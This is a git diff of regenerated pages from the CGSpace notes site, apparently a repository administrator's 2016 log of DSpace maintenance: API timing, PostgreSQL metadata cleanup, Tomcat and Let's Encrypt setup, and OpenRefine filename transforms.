<li>We weren&rsquo;t out of heap yet, but it&rsquo;s probably fair enough that the DSpace 5 upgrade (and new Atmire modules) requires more memory so it&rsquo;s ok</li>
<li>A possible side effect is that I see that the REST API is twice as fast for the request above now:</li>
</ul>
<pre><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
<pre tabindex="0"><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
1.368
$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
0.968
@ -214,7 +214,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<li>CGSpace has been up and down all day and REST API is completely unresponsive</li>
<li>PostgreSQL idle connections are currently:</li>
</ul>
<pre><code>postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>postgres@linode01:~$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
28
</code></pre><ul>
<li>I have reverted all the pgtune tweaks from the other day, as they didn&rsquo;t fix the stability issues, so I&rsquo;d rather not have them introducing more variables into the equation</li>
@ -229,7 +229,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<li>Atmire sent <a href="https://github.com/ilri/DSpace/pull/161">some fixes</a> to DSpace&rsquo;s REST API code that was leaving contexts open (causing the slow performance and database issues)</li>
<li>After deploying the fix to CGSpace the REST API is consistently faster:</li>
</ul>
<pre><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
<pre tabindex="0"><code>$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
0.675
$ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle/10568/32802?expand=all
0.599
@ -264,15 +264,15 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -28,7 +28,7 @@ Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_
I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
Update GitHub wiki for documentation of maintenance tasks.
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -58,12 +58,12 @@ Update GitHub wiki for documentation of maintenance tasks.
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -110,7 +110,7 @@ Update GitHub wiki for documentation of maintenance tasks.
<time datetime="2016-01-13T13:18:00+03:00">Wed Jan 13, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -135,7 +135,7 @@ Update GitHub wiki for documentation of maintenance tasks.
<li>Tweak date-based facets to show more values in drill-down ranges (<a href="https://github.com/ilri/DSpace/issues/162">#162</a>)</li>
<li>Need to remember to clear the Cocoon cache after deployment or else you don&rsquo;t see the new ranges immediately</li>
<li>Set up recipe on IFTTT to tweet new items from the CGSpace Atom feed to my twitter account</li>
<li>Altmetrics' support for Handles is kinda weak, so they can&rsquo;t associate our items with DOIs until they are tweeted or blogged, etc first.</li>
<li>Altmetrics&rsquo; support for Handles is kinda weak, so they can&rsquo;t associate our items with DOIs until they are tweeted or blogged, etc first.</li>
</ul>
<h2 id="2016-01-21">2016-01-21</h2>
<ul>
@ -200,15 +200,15 @@ $ find SimpleArchiveForBio/ -iname &ldquo;*.pdf&rdquo; -exec basename {} ; | sor
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -38,7 +38,7 @@ I noticed we have a very interesting list of countries on CGSpace:
Not only are there 49,000 countries, we have some blanks (25)&hellip;
Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -68,12 +68,12 @@ Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&r
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -120,7 +120,7 @@ Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&r
<time datetime="2016-02-05T13:18:00+03:00">Fri Feb 05, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -140,20 +140,20 @@ Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&r
<li>Found a way to get items with null/empty metadata values from SQL</li>
<li>First, find the <code>metadata_field_id</code> for the field you want from the <code>metadatafieldregistry</code> table:</li>
</ul>
<pre><code>dspacetest=# select * from metadatafieldregistry;
<pre tabindex="0"><code>dspacetest=# select * from metadatafieldregistry;
</code></pre><ul>
<li>In this case our country field is 78</li>
<li>Now find all resources with type 2 (item) that have null/empty values for that field:</li>
</ul>
<pre><code>dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
<pre tabindex="0"><code>dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value=&#39;&#39; OR text_value IS NULL);
</code></pre><ul>
<li>Then you can find the handle that owns it from its <code>resource_id</code>:</li>
</ul>
<pre><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;22678&#39;;
</code></pre><ul>
<li>It&rsquo;s 25 items so editing in the web UI is annoying, let&rsquo;s try SQL!</li>
</ul>
<pre><code>dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value=&#39;&#39;;
DELETE 25
</code></pre><ul>
<li>After that perhaps a regular <code>dspace index-discovery</code> (no -b) <em>should</em> suffice&hellip;</li>
@ -171,7 +171,7 @@ DELETE 25
<li>I need to start running DSpace in Mac OS X instead of a Linux VM</li>
<li>Install PostgreSQL from homebrew, then configure and import CGSpace database dump:</li>
</ul>
<pre><code>$ postgres -D /opt/brew/var/postgres
<pre tabindex="0"><code>$ postgres -D /opt/brew/var/postgres
$ createuser --superuser postgres
$ createuser --pwprompt dspacetest
$ createdb -O dspacetest --encoding=UNICODE dspacetest
@ -187,7 +187,7 @@ $ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sq
</code></pre><ul>
<li>After building and running a <code>fresh_install</code> I symlinked the webapps into Tomcat&rsquo;s webapps folder:</li>
</ul>
<pre><code>$ mv /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT.orig
<pre tabindex="0"><code>$ mv /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT.orig
$ ln -sfv ~/dspace/webapps/xmlui /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/ROOT
$ ln -sfv ~/dspace/webapps/rest /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/rest
$ ln -sfv ~/dspace/webapps/jspui /opt/brew/Cellar/tomcat/8.0.30/libexec/webapps/jspui
@ -198,11 +198,11 @@ $ /opt/brew/Cellar/tomcat/8.0.30/bin/catalina start
<li>Add CATALINA_OPTS in <code>/opt/brew/Cellar/tomcat/8.0.30/libexec/bin/setenv.sh</code>, as this script is sourced by the <code>catalina</code> startup script</li>
<li>For example:</li>
</ul>
<pre><code>CATALINA_OPTS=&quot;-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>CATALINA_OPTS=&#34;-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8&#34;
</code></pre><ul>
<li>After verifying that the site is working, start a full index:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace index-discovery -b
<pre tabindex="0"><code>$ ~/dspace/bin/dspace index-discovery -b
</code></pre><h2 id="2016-02-08">2016-02-08</h2>
<ul>
<li>Finish cleaning up and importing ~400 DAGRIS items into CGSpace</li>
@ -216,7 +216,7 @@ $ /opt/brew/Cellar/tomcat/8.0.30/bin/catalina start
<li>Help Sisay with OpenRefine</li>
<li>Enable HTTPS on DSpace Test using Let&rsquo;s Encrypt:</li>
</ul>
<pre><code>$ cd ~/src/git
<pre tabindex="0"><code>$ cd ~/src/git
$ git clone https://github.com/letsencrypt/letsencrypt
$ cd letsencrypt
$ sudo service nginx stop
@ -231,15 +231,15 @@ $ ansible-playbook dspace.yml -l linode02 -t nginx,firewall -u aorth --ask-becom
<li>Getting more and more hangs on DSpace Test, seemingly random but also during CSV import</li>
<li>Logs don&rsquo;t always show anything right when it fails, but eventually one of these appears:</li>
</ul>
<pre><code>org.dspace.discovery.SearchServiceException: Error while processing facet fields: java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>org.dspace.discovery.SearchServiceException: Error while processing facet fields: java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>or</li>
</ul>
<pre><code>Caused by: java.util.NoSuchElementException: Timeout waiting for idle object
<pre tabindex="0"><code>Caused by: java.util.NoSuchElementException: Timeout waiting for idle object
</code></pre><ul>
<li>Right now DSpace Test&rsquo;s Tomcat heap is set to 1536m and we have quite a bit of free RAM:</li>
</ul>
<pre><code># free -m
<pre tabindex="0"><code># free -m
total used free shared buffers cached
Mem: 3950 3902 48 9 37 1311
-/+ buffers/cache: 2552 1397
@ -253,11 +253,11 @@ Swap: 255 57 198
<li>There are 1200 records that have PDFs, and will need to be imported into CGSpace</li>
<li>I created a <code>filename</code> column based on the <code>dc.identifier.url</code> column using the following transform:</li>
</ul>
<pre><code>value.split('/')[-1]
<pre tabindex="0"><code>value.split(&#39;/&#39;)[-1]
</code></pre><ul>
<li>Then I wrote a tool called <a href="https://gist.github.com/alanorth/2206f24483fe5f0454fc"><code>generate-thumbnails.py</code></a> to download the PDFs and generate thumbnails for them, for example:</li>
</ul>
<pre><code>$ ./generate-thumbnails.py ciat-reports.csv
<pre tabindex="0"><code>$ ./generate-thumbnails.py ciat-reports.csv
Processing 64661.pdf
&gt; Downloading 64661.pdf
&gt; Creating thumbnail for 64661.pdf
@ -278,13 +278,13 @@ Processing 64195.pdf
<li>Looking at CIAT&rsquo;s records again, there are some files linking to PDFs on Slide Share, Embrapa, UEA UK, and Condesan, so I&rsquo;m not sure if we can use those</li>
<li>265 items have dirty, URL-encoded filenames:</li>
</ul>
<pre><code>$ ls | grep -c -E &quot;%&quot;
<pre tabindex="0"><code>$ ls | grep -c -E &#34;%&#34;
265
</code></pre><ul>
<li>I suggest that we import ~850 or so of the clean ones first, then do the rest after I can find a clean/reliable way to decode the filenames</li>
<li>This python2 snippet seems to work in the CLI, but not so well in OpenRefine:</li>
</ul>
<pre><code>$ python -c &quot;import urllib, sys; print urllib.unquote(sys.argv[1])&quot; CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
<pre tabindex="0"><code>$ python -c &#34;import urllib, sys; print urllib.unquote(sys.argv[1])&#34; CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
</code></pre><ul>
<li>Merge pull requests for submission form theming (<a href="https://github.com/ilri/DSpace/pull/178">#178</a>) and missing center subjects in XMLUI item views (<a href="https://github.com/ilri/DSpace/pull/176">#176</a>)</li>
@ -294,7 +294,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<ul>
<li>Turns out OpenRefine has an unescape function!</li>
</ul>
<pre><code>value.unescape(&quot;url&quot;)
<pre tabindex="0"><code>value.unescape(&#34;url&#34;)
</code></pre><ul>
<li>This turns the URLs into human-readable versions that we can use as proper filenames</li>
<li>Run web server and system updates on DSpace Test and reboot</li>
@ -302,7 +302,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<li>Then you create a facet for blank values on each column, show the rows that have values for one and not the other, then transform each independently to have the contents of the other, with &ldquo;||&rdquo; in between</li>
<li>Work on Python script for parsing and downloading PDF records from <code>dc.identifier.url</code></li>
<li>To get filenames from <code>dc.identifier.url</code>, create a new column based on this transform: <code>forEach(value.split('||'), v, v.split('/')[-1]).join('||')</code></li>
<li>This also works for records that have multiple URLs (separated by &ldquo;||&quot;)</li>
<li>This also works for records that have multiple URLs (separated by &ldquo;||&rdquo;)</li>
</ul>
<h2 id="2016-02-17">2016-02-17</h2>
<ul>
@ -316,7 +316,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<li>Turns out the &ldquo;bug&rdquo; in SAFBuilder isn&rsquo;t a bug, it&rsquo;s a feature that allows you to encode extra information like the destintion bundle in the filename</li>
<li>Also, it seems DSpace&rsquo;s SAF import tool doesn&rsquo;t like importing filenames that have accents in them:</li>
</ul>
<pre><code>java.io.FileNotFoundException: /usr/share/tomcat7/SimpleArchiveFormat/item_1021/CIAT_COLOMBIA_000075_Medición_de_palatabilidad_en_forrajes.pdf (No such file or directory)
<pre tabindex="0"><code>java.io.FileNotFoundException: /usr/share/tomcat7/SimpleArchiveFormat/item_1021/CIAT_COLOMBIA_000075_Medición_de_palatabilidad_en_forrajes.pdf (No such file or directory)
</code></pre><ul>
<li>Need to rename files to have no accents or umlauts, etc&hellip;</li>
<li>Useful custom text facet for URLs ending with &ldquo;.pdf&rdquo;: <code>value.endsWith(&quot;.pdf&quot;)</code></li>
@ -325,12 +325,12 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<ul>
<li>To change Spanish accents to ASCII in OpenRefine:</li>
</ul>
<pre><code>value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
<pre tabindex="0"><code>value.replace(&#39;ó&#39;,&#39;o&#39;).replace(&#39;í&#39;,&#39;i&#39;).replace(&#39;á&#39;,&#39;a&#39;).replace(&#39;é&#39;,&#39;e&#39;).replace(&#39;ñ&#39;,&#39;n&#39;)
</code></pre><ul>
<li>But actually, the accents might not be an issue, as I can successfully import files containing Spanish accents on my Mac</li>
<li>On closer inspection, I can import files with the following names on Linux (DSpace Test):</li>
</ul>
<pre><code>Bitstream: tést.pdf
<pre tabindex="0"><code>Bitstream: tést.pdf
Bitstream: tést señora.pdf
Bitstream: tést señora alimentación.pdf
</code></pre><ul>
@ -353,7 +353,7 @@ Bitstream: tést señora alimentación.pdf
<li>Looking at the filenames for the CIAT Reports, some have some really ugly characters, like: <code>'</code> or <code>,</code> or <code>=</code> or <code>[</code> or <code>]</code> or <code>(</code> or <code>)</code> or <code>_.pdf</code> or <code>._</code> etc</li>
<li>It&rsquo;s tricky to parse those things in some programming languages so I&rsquo;d rather just get rid of the weird stuff now in OpenRefine:</li>
</ul>
<pre><code>value.replace(&quot;'&quot;,'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#39;&#39;).replace(&#39;_=_&#39;,&#39;_&#39;).replace(&#39;,&#39;,&#39;&#39;).replace(&#39;[&#39;,&#39;&#39;).replace(&#39;]&#39;,&#39;&#39;).replace(&#39;(&#39;,&#39;&#39;).replace(&#39;)&#39;,&#39;&#39;).replace(&#39;_.pdf&#39;,&#39;.pdf&#39;).replace(&#39;._&#39;,&#39;_&#39;)
</code></pre><ul>
<li>Finally import the 1127 CIAT items into CGSpace: <a href="https://cgspace.cgiar.org/handle/10568/35710">https://cgspace.cgiar.org/handle/10568/35710</a></li>
<li>Re-deploy CGSpace with the Google Scholar fix, but I&rsquo;m waiting on the Atmire fixes for now, as the branch history is ugly</li>
@ -378,15 +378,15 @@ Bitstream: tést señora alimentación.pdf
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -28,7 +28,7 @@ Looking at issues with author authorities on CGSpace
For some reason we still have the index-lucene-update cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module
Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -58,12 +58,12 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -110,7 +110,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<time datetime="2016-03-02T16:50:00+03:00">Wed Mar 02, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -128,7 +128,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<li>I identified one commit that causes the issue and let them know</li>
<li>Restart DSpace Test, as it seems to have crashed after Sisay tried to import some CSV or zip or something:</li>
</ul>
<pre><code>Exception in thread &quot;Lucene Merge Thread #19&quot; org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
<pre tabindex="0"><code>Exception in thread &#34;Lucene Merge Thread #19&#34; org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
</code></pre><h2 id="2016-03-08">2016-03-08</h2>
<ul>
<li>Add a few new filters to Atmire&rsquo;s Listings and Reports module (<a href="https://github.com/ilri/DSpace/issues/180">#180</a>)</li>
@ -175,7 +175,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<li>Help Sisay with some PostgreSQL queries to clean up the incorrect <code>dc.contributor.corporateauthor</code> field</li>
<li>I noticed that we have some weird values in <code>dc.language</code>:</li>
</ul>
<pre><code># select * from metadatavalue where metadata_field_id=37;
<pre tabindex="0"><code># select * from metadatavalue where metadata_field_id=37;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+------------+-----------+-------+-----------+------------+------------------
1942571 | 35342 | 37 | hi | | 1 | | -1 | 2
@ -215,7 +215,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<ul>
<li>Command used:</li>
</ul>
<pre><code>$ gm convert -trim -quality 82 -thumbnail x300 -flatten Descriptor\ for\ Butia_EN-2015_2021.pdf\[0\] cover.jpg
<pre tabindex="0"><code>$ gm convert -trim -quality 82 -thumbnail x300 -flatten Descriptor\ for\ Butia_EN-2015_2021.pdf\[0\] cover.jpg
</code></pre><ul>
<li>Also, it looks like adding <code>-sharpen 0x1.0</code> really improves the quality of the image for only a few KB</li>
</ul>
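<ul>
<li>For example, a sketch of the same command with <code>-sharpen</code> added (the exact placement of the flag is an assumption):</li>
</ul>
<pre><code>$ gm convert -trim -quality 82 -thumbnail x300 -sharpen 0x1.0 -flatten Descriptor\ for\ Butia_EN-2015_2021.pdf\[0\] cover.jpg
</code></pre>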
@ -261,7 +261,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<ul>
<li>Abenet is having problems saving group memberships, and she gets this error: <a href="https://gist.github.com/alanorth/87281c061c2de57b773e">https://gist.github.com/alanorth/87281c061c2de57b773e</a></li>
</ul>
<pre><code>Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
<pre tabindex="0"><code>Can&#39;t find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
</code></pre><ul>
<li>I can reproduce the same error on DSpace Test and on my Mac</li>
<li>Looks to be an issue with the Atmire modules, I&rsquo;ve submitted a ticket to their tracker.</li>
@ -316,15 +316,15 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -32,7 +32,7 @@ After running DSpace for over five years I&rsquo;ve never needed to look in any
This will save us a few gigs of backup space we&rsquo;re paying for on S3
Also, I noticed the checker log has some errors we should pay attention to:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -62,12 +62,12 @@ Also, I noticed the checker log has some errors we should pay attention to:
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -114,7 +114,7 @@ Also, I noticed the checker log has some errors we should pay attention to:
<time datetime="2016-04-04T11:06:00+03:00">Mon Apr 04, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
